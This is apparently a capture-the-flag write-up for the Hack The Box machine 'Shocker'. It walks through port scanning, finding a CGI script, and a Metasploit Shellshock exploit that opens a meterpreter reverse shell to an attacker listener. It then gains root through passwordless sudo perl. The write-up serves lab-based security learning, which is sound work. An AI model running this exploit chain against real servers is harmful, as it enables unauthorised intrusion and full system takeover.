Machine: https://app.hackthebox.com/machines/Shocker
On to the next machine! Me being lazy just trying port 80 before doing any scan:
So let’s bug him? We got the following software running on the server:
$ sudo nmap -sV -O shocker.htb
...
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Old Apache means we should look for scripts in /cgi-bin and maybe be able to exploit one using Shellshock.
After much (dir)busting, I found this:
$ curl http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
08:49:56 up 1:21, 0 users, load average: 0.06, 0.06, 0.01
Then I used Metasploit with the following options (truncated default values from the paste) and got an initial foothold as a user:
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS shocker.htb yes The target host(s)
RPORT 80 yes The target port (TCP)
TARGETURI /cgi-bin/user.sh yes Path to CGI script
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux x86_64
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.56:40898) at 2023-01-09 08:58:46 -0500
meterpreter > getuid
Server username: shelly
And we have the user flag:
meterpreter > cat /home/shelly/user.txt
aada***********************************
Getting root doesn’t seem to be much more complicated. We can run sudo perl
as root without any password:
meterpreter > shell
Process 3852 created.
Channel 4 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:~$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
So we g3t r00t
and find the flag:
$ echo "system('whoami');" | sudo /usr/bin/perl
root
$ echo "system('cat /root/root.txt');" | sudo /usr/bin/perl
ff97****************************
What did we learn from this machine?
If the server looks empty, keep enumerating the URL. Go into specific file types that one may expect to find in directions like cgi-bin
. E.g. don’t look for .php
files in cgi-bin
but rather .cgi
or .sh
.